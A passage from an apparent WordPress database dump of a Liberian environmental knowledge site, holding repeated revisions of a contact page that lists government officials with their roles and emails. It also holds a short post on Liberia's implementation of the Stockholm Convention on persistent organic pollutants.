src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 13:24:21','2021-03-29 13:24:21','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3663,42,'2021-03-29 13:24:21','2021-03-29 13:24:21','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 13:24:21','2021-03-29 13:24:21','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3664,42,'2021-04-12 13:43:31','2021-04-12 13:43:31','The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from chemicals known as POPs. Liberia acceded to this convention in 2002 and in fulfilment of the country’s obligation under Article 7 of the Convention, Liberia prepared its national implementation plan (NIP) in 2006 and updated the NIP in 2014. National priorities identified in the two versions of the NIP are yet to be implemented due to lack of funding. Liberia participated in many enabling projects covering awareness, training of custom officers and conduct of chemical inventory in four counties including Bomi, Margibi, Grand Bassa and Montserrado Counties.\r\n\r\nThe two active projects operating under the convention are Lead Paint Law and AFLDC-2. The Lead Paint Law Project is a national initiative and does not have external support. Since the Environmental Protection and Management Law of Liberia has a provision of lead in paint, we are developing regulation instead of law. The AFLDC-2 is a GEF funded Project that is over $2,000,000.00. It was already approved but implementation is at a standstill due to the current COVID pandemic.\r\n\r\nNational Focal Point\r\n\r\nJerry T. Toe Sr is the National Focal Point for the Stockholm Convention on Persistent Organic Pollutants. He earned MSc in Organic Chemistry from the Beijing University of Chemical Technology. He also holds a BSc degree in Pharmacology (B-Pharm) and Bachelor of Science Degree in General Chemistry in from the University of Liberia\r\n\r\nMr. Toe joined EPA family in 2010 as Industry and Remediation Analyst. He later served as Manager of the Department of Compliance and Enforce for five consecutive years. His goal is to collaborate with the Environmental Research and Standards Unit for the establishment a chemical regulatory body known as National Inter-Sectoral committee on Chemical Management (NICCM).','Stockholm Convention on Persistent Organic Pollutants','','publish','closed','closed','','stockholm-convention','','','2021-04-12 13:51:08','2021-04-12 13:51:08','',0,'https://ekmsliberia.info/?post_type=mea_resource&#038;p=3664',3,'mea_resource','',0),(3670,42,'2021-04-06 09:10:17','2021-04-06 09:10:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" 